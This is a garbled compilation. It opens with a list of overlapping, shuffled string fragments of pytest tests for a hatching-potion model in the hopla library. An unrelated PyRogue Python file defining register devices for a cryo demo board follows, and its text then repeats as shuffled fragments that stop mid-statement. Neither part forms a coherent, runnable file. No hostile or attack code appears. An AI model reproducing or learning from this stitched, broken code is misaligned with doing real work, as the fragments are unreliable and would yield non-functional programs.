"False assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10), (\"Windup\", 1), (\"Vampire\", 0),",
"HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names,",
"quantity1 = \"Dessert\", 10 potion2, quantity2 = \"MossyStone\", 1 potion3, quantity3 = \"StainedGlass\",",
"2}) == HatchPotionCollection({\"Windup\": 2}) assert HatchPotionCollection({\"Frost\": 1}) != HatchPotionCollection({\"Frost\": 2}) def test__iter__ok(self): collection",
"assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] ==",
"\"Glow\": 1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert left != right assert",
"import List import click import pytest from hopla.hoplalib.errors import YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata import",
"1, \"Moonglow\": 42, \"Sunset\": 0}) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1) assert collection[\"Moonglow\"] ==",
"click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) ) def test__init__invalid_quantity_fail(self, potion_name: str, quantity:",
"HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\")",
"as exec_info: HatchPotion(name, quantity=1) assert str(exec_info.value).startswith(f\"{name} is not a valid hatching potion name.\")",
"HatchPotion(\"Base\", quantity=potion1_quantity - 1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert collection[potion3_name]",
"1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert left != right assert HatchPotionCollection()",
"potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def test__init__empty_ok(self): collection =",
"(\"Dessert\", 0), ]) def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity)",
"potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=potion1_quantity - 1)",
"is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10), (\"Dessert\", 0), ]) def test_is_wacky_hatch_potion(self, potion_name: str,",
"HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self):",
"!= right assert HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection() assert HatchPotionCollection({\"Windup\":",
"HatchPotionCollection({\"Base\": 1}) not_found_potion_name = \"Moonglow\" with pytest.raises(HatchPotionException) as exec_info: collection.remove_hatch_potion(HatchPotion(not_found_potion_name)) expected_msg = f\"{not_found_potion_name}",
"\"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] ==",
"\"Vampire\", 3 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) result:",
"HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self): potion1, quantity1 = \"Dessert\", 10 potion2, quantity2 = \"MossyStone\",",
"assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"BirchBark\", 10), (\"Windup\", 1), (\"Vampire\", 0), (\"Ruby\",",
"HatchPotion(\"Shimmer\", quantity=1) == HatchPotion(\"Shimmer\") assert HatchPotion(\"Silver\") != HatchPotion(\"Silver\", quantity=2) assert HatchPotion(\"Watery\") != HatchPotion(\"Glow\")",
"right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert left != right assert HatchPotionCollection() ==",
"]) def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion()",
"left = HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2}) assert",
"str(exec_info.value).startswith(f\"{quantity} is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE)))",
"valid hatching potion name.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0)))",
"assert collection[potion3_name] == HatchPotion(potion3_name, quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({\"Base\": 1})",
"collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 0}) assert collection[\"Base\"] == HatchPotion(\"Base\", quantity=1)",
"next(iterator) == \"Moonglow\" assert next(iterator) == \"Sunset\" with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection",
"test__init__ok(self): potion_dict = {\"Base\": 0, \"Moonglow\": 42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict) assert",
"3 potion2_quantity = 42 potion3_name, potion3_quantity = \"Sunset\", 1 collection = HatchPotionCollection({ \"Base\":",
"= HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) result: List[HatchPotion] = list(collection.values())",
"- 1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert collection[potion3_name] == HatchPotion(potion3_name,",
"assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def test__init__empty_ok(self): collection",
"= repr(potion) assert result == f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self): assert HatchPotion(\"Red\") == HatchPotion(\"Red\")",
"quantity: int): potion = HatchPotion(potion_name, quantity=quantity) result: str = repr(potion) assert result ==",
"quantity=potion1_quantity - 1) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=potion2_quantity - 1) assert collection[potion3_name] ==",
"41 potion3, quantity3 = \"Vampire\", 3 collection = HatchPotionCollection({ potion1: quantity1, potion2: quantity2,",
"is below 0.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(0, _SAMPLE_SIZE))) )",
"quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is True",
"\"Base\" assert next(iterator) == \"Moonglow\" assert next(iterator) == \"Sunset\" with pytest.raises(StopIteration): next(iterator) def",
"quantity2 = \"Sunshine\", 41 potion3, quantity3 = \"Vampire\", 3 collection = HatchPotionCollection({ potion1:",
"is False assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is True class TestHatchPotionCollection: def",
"2}) assert HatchPotionCollection({\"Frost\": 1}) != HatchPotionCollection({\"Frost\": 2}) def test__iter__ok(self): collection = HatchPotionCollection({\"Base\": 1,",
"quantity2, potion3: quantity3 }) generator = collection.values() assert next(generator) == HatchPotion(potion1, quantity=quantity1) assert",
"HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left = HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right = HatchPotionCollection({\"Glow\":",
"import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE = 10 class",
"= 42 potion3_name, potion3_quantity = \"Sunset\", 1 collection = HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\":",
"1, \"Moonglow\": 42, \"Sunset\": 2}) iterator = iter(collection) assert next(iterator) == \"Base\" assert",
"quantity=quantity2) assert next(generator) == HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration): _ = next(generator) def test_values_as_list_ok(self):",
"assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left",
"potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is False assert",
"HatchPotion(\"Base\", quantity=0) assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def",
"assert collection == HatchPotionCollection({}) assert len(collection) == 0 def test__init__ok(self): potion_dict = {\"Base\":",
"= HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion()",
"List[HatchPotion] = [ HatchPotion(potion1, quantity=quantity1), HatchPotion(potion2, quantity=quantity2), HatchPotion(potion3, quantity=quantity3) ] assert result ==",
"quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion() is False assert potion.is_wacky_hatch_potion() is False",
"HatchPotion(potion3_name, quantity=potion3_quantity - 1) def test_remove_hatch_potion_not_available_faile(self): collection = HatchPotionCollection({\"Base\": 1}) not_found_potion_name = \"Moonglow\"",
"potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10), (\"Dessert\", 0), ]) def test_is_wacky_hatch_potion(self, potion_name:",
"with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 0})",
"next(iterator) == \"Sunset\" with pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\":",
"not a valid hatching potion name.\") assert exec_info.errisinstance((YouFoundABugRewardError, click.ClickException)) @pytest.mark.parametrize( \"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE),",
"quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is False",
"False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\", 10),",
"result == f\"HatchPotion({potion_name}: {quantity})\" def test__eq__(self): assert HatchPotion(\"Red\") == HatchPotion(\"Red\") assert HatchPotion(\"Shimmer\", quantity=1)",
"int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True",
"= 3 potion2_quantity = 42 potion3_name, potion3_quantity = \"Sunset\", 1 collection = HatchPotionCollection({",
"str, quantity: int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert str(exec_info.value).startswith(f\"{quantity} is below",
"def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity) assert",
"assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=2) def test__eq__ok(self): left = HatchPotionCollection({\"Frost\": 1, \"Glow\": 1})",
"= \"Sunshine\", 41 potion3, quantity3 = \"Vampire\", 3 collection = HatchPotionCollection({ potion1: quantity1,",
"HatchPotionCollection() == HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2}) == HatchPotionCollection({\"Windup\":",
"10), (\"Dessert\", 0), ]) def test_is_wacky_hatch_potion(self, potion_name: str, quantity: int): potion = HatchPotion(potion_name,",
"hopla.hoplalib.hatchery.hatchdata import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import HatchPotion, HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE = 10",
"pytest.raises(StopIteration): next(iterator) def test__getitem__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 0}) assert",
"with pytest.raises(StopIteration): _ = next(generator) def test_values_as_list_ok(self): potion1, quantity1 = \"Golden\", 1 potion2,",
"\"potion_name,quantity\", list(zip(random.sample(HatchPotionData.hatch_potion_names, k=_SAMPLE_SIZE), range(-_SAMPLE_SIZE, 0))) ) def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int): with",
"2}) def test__iter__ok(self): collection = HatchPotionCollection({\"Base\": 1, \"Moonglow\": 42, \"Sunset\": 2}) iterator =",
"is False assert potion.is_magic_hatch_potion() is True assert potion.is_wacky_hatch_potion() is False @pytest.mark.parametrize(\"potion_name,quantity\", [ (\"Veggie\",",
"HatchPotionCollection() assert collection == HatchPotionCollection({}) assert len(collection) == 0 def test__init__ok(self): potion_dict =",
"42 potion3_name, potion3_quantity = \"Sunset\", 1 collection = HatchPotionCollection({ \"Base\": potion1_quantity, \"Moonglow\": potion2_quantity,",
"import pytest from hopla.hoplalib.errors import YouFoundABugRewardError from hopla.hoplalib.hatchery.hatchdata import HatchPotionData from hopla.hoplalib.hatchery.hatchpotionmodels import",
"potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is False assert potion.is_magic_hatch_potion() is True assert",
"HatchPotionCollection() assert HatchPotionCollection({\"StarryNight\": 1}) != HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2}) == HatchPotionCollection({\"Windup\": 2}) assert",
"assert collection[\"Moonglow\"] == HatchPotion(\"Moonglow\", quantity=42) assert collection[\"Sunset\"] == HatchPotion(\"Sunset\", quantity=0) def test_values_ok(self): potion1,",
"!= HatchPotionCollection() assert HatchPotionCollection({\"Windup\": 2}) == HatchPotionCollection({\"Windup\": 2}) assert HatchPotionCollection({\"Frost\": 1}) != HatchPotionCollection({\"Frost\":",
"HatchPotionCollection({ potion1: quantity1, potion2: quantity2, potion3: quantity3 }) generator = collection.values() assert next(generator)",
"str, quantity: int): potion = HatchPotion(potion_name, quantity=quantity) assert potion.is_standard_hatch_potion() is True assert potion.is_magic_hatch_potion()",
"collection.values() assert next(generator) == HatchPotion(potion1, quantity=quantity1) assert next(generator) == HatchPotion(potion2, quantity=quantity2) assert next(generator)",
"\"Golden\", 1 potion2, quantity2 = \"Sunshine\", 41 potion3, quantity3 = \"Vampire\", 3 collection",
"\"Base\": potion1_quantity, \"Moonglow\": potion2_quantity, potion3_name: potion3_quantity }) collection.remove_hatch_potion(HatchPotion(\"Base\")) collection.remove_hatch_potion(HatchPotion(\"Moonglow\")) collection.remove_hatch_potion(HatchPotion(potion3_name)) assert collection[\"Base\"] ==",
"test__eq__ok(self): left = HatchPotionCollection({\"Frost\": 1, \"Glow\": 1}) right = HatchPotionCollection({\"Glow\": 1, \"Frost\": 2})",
"import HatchPotion, HatchPotionCollection, \\ HatchPotionException _SAMPLE_SIZE = 10 class TestHatchPotion: def test__init__invalid_name_fail(self): name",
"def test__init__ok(self): potion_dict = {\"Base\": 0, \"Moonglow\": 42, \"Sunset\": 2} collection = HatchPotionCollection(potion_dict)",
"next(generator) == HatchPotion(potion3, quantity=quantity3) with pytest.raises(StopIteration): _ = next(generator) def test_values_as_list_ok(self): potion1, quantity1",
"\"Sunset\": 2}) iterator = iter(collection) assert next(iterator) == \"Base\" assert next(iterator) == \"Moonglow\"",
") def test__init__invalid_quantity_fail(self, potion_name: str, quantity: int): with pytest.raises(HatchPotionException) as exec_info: HatchPotion(potion_name, quantity=quantity)"
] |
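Read together, these tests pin down a small contract for HatchPotion: quantity defaults to 1, equality compares name and quantity by value, and repr follows the fixed "HatchPotion(name: quantity)" format. The snippet below is a minimal sketch of just that contract under a hypothetical name, SketchHatchPotion; the real class in hopla.hoplalib.hatchery.hatchpotionmodels additionally validates names against HatchPotionData and rejects negative quantities, which this sketch deliberately omits.

# Minimal sketch of the equality/repr contract exercised above; purely
# illustrative and not hopla's actual implementation.
from dataclasses import dataclass


@dataclass
class SketchHatchPotion:
    name: str
    quantity: int = 1  # test__eq__ shows the default quantity is 1

    def __repr__(self) -> str:
        # The exact format asserted by test__repr__ok.
        return f"HatchPotion({self.name}: {self.quantity})"

A dataclass is a natural fit here because its generated __eq__ compares fields by value, so SketchHatchPotion("Silver") != SketchHatchPotion("Silver", quantity=2) holds exactly as test__eq__ asserts for the real class.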
<filename>firmware/common/pyrogue/common/AppCore.py
#!/usr/bin/env python
#-----------------------------------------------------------------------------
# Title : PyRogue AMC Carrier Cryo Demo Board Application
#-----------------------------------------------------------------------------
# File : AppCore.py
# Created : 2017-04-03
#-----------------------------------------------------------------------------
# Description:
# PyRogue AMC Carrier Cryo Demo Board Application
#-----------------------------------------------------------------------------
# This file is part of the rogue software platform. It is subject to
# the license terms in the LICENSE.txt file found in the top-level directory
# of this distribution and at:
# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
# No part of the rogue software platform, including this file, may be
# copied, modified, propagated, or distributed except according to the terms
# contained in the LICENSE.txt file.
#-----------------------------------------------------------------------------
import pyrogue as pr

from common.SimRtmCryoDet import *


class StreamData(pr.Device):
    def __init__( self,
            name        = "StreamReg",
            description = "Stream control",
            **kwargs):
        super().__init__(name=name, description=description, **kwargs)

        #########
        # Devices
        for i in range(4096):
            self.add(pr.RemoteVariable(
                name        = f'StreamData[{i}]',
                description = "Dummy stream data",
                offset      = 0x000000 + i*0x2,
                bitSize     = 16,
                bitOffset   = 0,
                base        = pr.Int,
                mode        = "RW",
            ))


class StreamControl(pr.Device):
    def __init__( self,
            name        = "StreamControl",
            description = "Stream control",
            **kwargs):
        super().__init__(name=name, description=description, **kwargs)

        #########
        # Devices
        self.add(pr.RemoteVariable(
            name        = "EnableStreams",
            description = "EnableStream",
            offset      = 0x00000008,
            bitSize     = 1,
            bitOffset   = 0,
            base        = pr.UInt,
            mode        = "RW",
        ))

        self.add(pr.RemoteVariable(
            name        = "StreamCounterRst",
            description = "Reset stream counters",
            offset      = 0x00000008,
            bitSize     = 1,
            bitOffset   = 8,
            base        = pr.UInt,
            mode        = "RW",
        ))

        self.add(pr.RemoteVariable(
            name        = "EofeCounterRst",
            description = "Reset stream EOFE",
            offset      = 0x00000008,
            bitSize     = 1,
            bitOffset   = 9,
            base        = pr.UInt,
            mode        = "RW",
        ))

        self.add(pr.RemoteVariable(
            name        = "StreamCounter",
            description = "Count number of stream triggers",
            offset      = 0x0000000C,
            bitSize     = 32,
            bitOffset   = 0,
            base        = pr.UInt,
            mode        = "RO",
            pollInterval = 1,
        ))

        self.add(pr.RemoteVariable(
            name        = "EofeCounter",
            description = "Stream EOFE counter",
            offset      = 0x00000010,
            bitSize     = 32,
            bitOffset   = 0,
            base        = pr.UInt,
            mode        = "RO",
            pollInterval = 1,
        ))


class AppCore(pr.Device):
    def __init__( self,
            name        = "AppCore",
            description = "MicrowaveMux Application",
            numRxLanes  = [0,0],
            numTxLanes  = [0,0],
            **kwargs):
        super().__init__(name=name, description=description, **kwargs)

        #########
        # Devices
        #########
        # for i in range(2):
        #     if ((numRxLanes[i] > 0) or (numTxLanes[i] > 0)):
        #         self.add(AmcMicrowaveMuxCore(
        #             name   = "MicrowaveMuxCore[%i]" % (i),
        #             offset = (i*0x00100000),
        #             expand = True,
        #         ))
        #
        # self.add(SysgenCryo(offset=0x01000000, expand=True))
        self.add(SimRtmCryoDet( offset=0x02000000, expand=False))

        ###########
        # Registers
        ###########
        self.add(pr.RemoteVariable(
            name        = "DacSigTrigDelay",
            description = "DacSig TrigDelay",
            offset      = 0x03000000,
            bitSize     = 24,
            bitOffset   = 0,
            base        = pr.UInt,
            mode        = "RW",
            units       = "1/(307MHz)",
        ))

        self.add(pr.RemoteVariable(
            name        = "DacSigTrigArm",
            description = "DacSig TrigArm",
            offset      = 0x03000004,
            bitSize     = 1,
            bitOffset   = 0,
            base        = pr.UInt,
            mode        = "WO",
            hidden      = True,
        ))

        self.add(StreamControl( offset=0x03000000, ))
        self.add(StreamData( offset=0x04000000, expand=False, ))

        ##############################
        # Commands
        ##############################
        @self.command(description="Arms for a DAC SIG Trigger to the DAQ MUX",)
        def
"= \"RW\", )) class StreamControl(pr.Device): def __init__( self, name = \"StreamControl\", description =",
"= \"EnableStreams\", description = \"EnableStream\", offset = 0x00000008, bitSize = 1, bitOffset =",
"= 0x00000008, bitSize = 1, bitOffset = 9, base = pr.UInt, mode =",
"directory # of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of",
"= \"MicrowaveMuxCore[%i]\" % (i), # offset = (i*0x00100000), # expand = True, #",
"= \"Stream control\", **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices self.add(pr.RemoteVariable( name =",
"32, bitOffset = 0, base = pr.UInt, mode = \"RO\", pollInterval = 1,",
"f'StreamData[{i}]', description = \"Dummy stream data\", offset = 0x000000 + i*0x2, bitSize =",
"Title : PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # File :",
"# Devices for i in range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]', description = \"Dummy",
"is part of the rogue software platform. It is subject to # the",
"\"Dummy stream data\", offset = 0x000000 + i*0x2, bitSize = 16, bitOffset =",
"(numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" % (i), # offset",
"= \"DacSig TrigDelay\", offset = 0x03000000, bitSize = 24, bitOffset = 0, base",
"= 0, base = pr.UInt, mode = \"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable(",
"description = \"Reset stream EOFE\", offset = 0x00000008, bitSize = 1, bitOffset =",
"name = \"StreamCounter\", description = \"Count number of stream triggers\", offset = 0x0000000C,",
"= \"DacSigTrigDelay\", description = \"DacSig TrigDelay\", offset = 0x03000000, bitSize = 24, bitOffset",
"description = \"Dummy stream data\", offset = 0x000000 + i*0x2, bitSize = 16,",
"including this file, may be # copied, modified, propagated, or distributed except according",
"Application\", numRxLanes = [0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) ######### #",
"TrigArm\", offset = 0x03000004, bitSize = 1, bitOffset = 0, base = pr.UInt,",
"16, bitOffset = 0, base = pr.Int, mode = \"RW\", )) class StreamControl(pr.Device):",
"# self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" % (i), # offset = (i*0x00100000), #",
"\"WO\", hidden = True, )) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000, expand=False, )) ##############################",
"LICENSE.txt file found in the top-level directory # of this distribution and at:",
"> 0) or (numTxLanes[i] > 0)): # self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" %",
"= 1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\", description = \"Stream EOFE counter\", offset",
"= \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description = \"Reset stream EOFE\", offset",
"name = \"AppCore\", description = \"MicrowaveMux Application\", numRxLanes = [0,0], numTxLanes = [0,0],",
"* class StreamData(pr.Device): def __init__( self, name = \"StreamReg\", description = \"Stream control\",",
"# PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # This file is",
"= 8, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\",",
"= 0x03000000, bitSize = 24, bitOffset = 0, base = pr.UInt, mode =",
")) # # self.add(SysgenCryo(offset=0x01000000, expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ########### # Registers ########### self.add(pr.RemoteVariable(",
"offset = 0x03000000, bitSize = 24, bitOffset = 0, base = pr.UInt, mode",
"Cryo Demo Board Application #----------------------------------------------------------------------------- # This file is part of the rogue",
": PyRogue AMC Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # File : AppCore.py",
"# File : AppCore.py # Created : 2017-04-03 #----------------------------------------------------------------------------- # Description: # PyRogue",
"% (i), # offset = (i*0x00100000), # expand = True, # )) #",
"0, base = pr.Int, mode = \"RW\", )) class StreamControl(pr.Device): def __init__( self,",
"Registers ########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description = \"DacSig TrigDelay\", offset = 0x03000000,",
"bitOffset = 8, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name =",
"Demo Board Application #----------------------------------------------------------------------------- # File : AppCore.py # Created : 2017-04-03 #-----------------------------------------------------------------------------",
"def __init__( self, name = \"StreamControl\", description = \"Stream control\", **kwargs): super().__init__(name=name, description=description,",
"self.add(pr.RemoteVariable( name = \"EofeCounter\", description = \"Stream EOFE counter\", offset = 0x00000010, bitSize",
"Cryo Demo Board Application #----------------------------------------------------------------------------- # File : AppCore.py # Created : 2017-04-03",
"######### # Devices for i in range(4096): self.add(pr.RemoteVariable( name = f'StreamData[{i}]', description =",
"Devices self.add(pr.RemoteVariable( name = \"EnableStreams\", description = \"EnableStream\", offset = 0x00000008, bitSize =",
"0, base = pr.UInt, mode = \"WO\", hidden = True, )) self.add(StreamControl( offset=0x03000000,",
"\"Stream EOFE counter\", offset = 0x00000010, bitSize = 32, bitOffset = 0, base",
"class AppCore(pr.Device): def __init__( self, name = \"AppCore\", description = \"MicrowaveMux Application\", numRxLanes",
"It is subject to # the license terms in the LICENSE.txt file found",
"mode = \"WO\", hidden = True, )) self.add(StreamControl( offset=0x03000000, )) self.add(StreamData( offset=0x04000000, expand=False,",
"= [0,0], numTxLanes = [0,0], **kwargs): super().__init__(name=name, description=description, **kwargs) ######### # Devices #########",
"\"EnableStreams\", description = \"EnableStream\", offset = 0x00000008, bitSize = 1, bitOffset = 0,",
"0, base = pr.UInt, mode = \"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name",
"base = pr.UInt, mode = \"RO\", pollInterval = 1, )) class AppCore(pr.Device): def",
"= 0x000000 + i*0x2, bitSize = 16, bitOffset = 0, base = pr.Int,",
"name = \"DacSigTrigArm\", description = \"DacSig TrigArm\", offset = 0x03000004, bitSize = 1,",
"of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of the rogue",
"#----------------------------------------------------------------------------- # File : AppCore.py # Created : 2017-04-03 #----------------------------------------------------------------------------- # Description: #",
"######### # for i in range(2): # if ((numRxLanes[i] > 0) or (numTxLanes[i]",
"# This file is part of the rogue software platform. It is subject",
"#!/usr/bin/env python #----------------------------------------------------------------------------- # Title : PyRogue AMC Carrier Cryo Demo Board Application",
"File : AppCore.py # Created : 2017-04-03 #----------------------------------------------------------------------------- # Description: # PyRogue AMC",
"Carrier Cryo Demo Board Application #----------------------------------------------------------------------------- # This file is part of the",
"pr.Int, mode = \"RW\", )) class StreamControl(pr.Device): def __init__( self, name = \"StreamControl\",",
"\"DacSig TrigDelay\", offset = 0x03000000, bitSize = 24, bitOffset = 0, base =",
"self.add(pr.RemoteVariable( name = \"EnableStreams\", description = \"EnableStream\", offset = 0x00000008, bitSize = 1,",
"software platform, including this file, may be # copied, modified, propagated, or distributed",
"StreamControl(pr.Device): def __init__( self, name = \"StreamControl\", description = \"Stream control\", **kwargs): super().__init__(name=name,",
"# https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. # No part of the rogue software platform, including this file,",
"mode = \"RO\", pollInterval = 1, )) self.add(pr.RemoteVariable( name = \"EofeCounter\", description =",
"= f'StreamData[{i}]', description = \"Dummy stream data\", offset = 0x000000 + i*0x2, bitSize",
"# contained in the LICENSE.txt file. #----------------------------------------------------------------------------- import pyrogue as pr from common.SimRtmCryoDet",
"1, )) class AppCore(pr.Device): def __init__( self, name = \"AppCore\", description = \"MicrowaveMux",
"= 0, base = pr.UInt, mode = \"RO\", pollInterval = 1, )) class",
"1, bitOffset = 0, base = pr.UInt, mode = \"WO\", hidden = True,",
"platform. It is subject to # the license terms in the LICENSE.txt file",
"in the top-level directory # of this distribution and at: # https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html. #",
"offset = 0x00000010, bitSize = 32, bitOffset = 0, base = pr.UInt, mode",
"expand=True)) self.add(SimRtmCryoDet( offset=0x02000000, expand=False)) ########### # Registers ########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description",
"########### self.add(pr.RemoteVariable( name = \"DacSigTrigDelay\", description = \"DacSig TrigDelay\", offset = 0x03000000, bitSize",
"mode = \"RW\", )) self.add(pr.RemoteVariable( name = \"EofeCounterRst\", description = \"Reset stream EOFE\",",
"for i in range(2): # if ((numRxLanes[i] > 0) or (numTxLanes[i] > 0)):",
"# No part of the rogue software platform, including this file, may be",
"1, bitOffset = 9, base = pr.UInt, mode = \"RW\", )) self.add(pr.RemoteVariable( name",
"\"RW\", units = \"1/(307MHz)\", )) self.add(pr.RemoteVariable( name = \"DacSigTrigArm\", description = \"DacSig TrigArm\",",
"this file, may be # copied, modified, propagated, or distributed except according to",
": 2017-04-03 #----------------------------------------------------------------------------- # Description: # PyRogue AMC Carrier Cryo Demo Board Application",
"> 0)): # self.add(AmcMicrowaveMuxCore( # name = \"MicrowaveMuxCore[%i]\" % (i), # offset =",
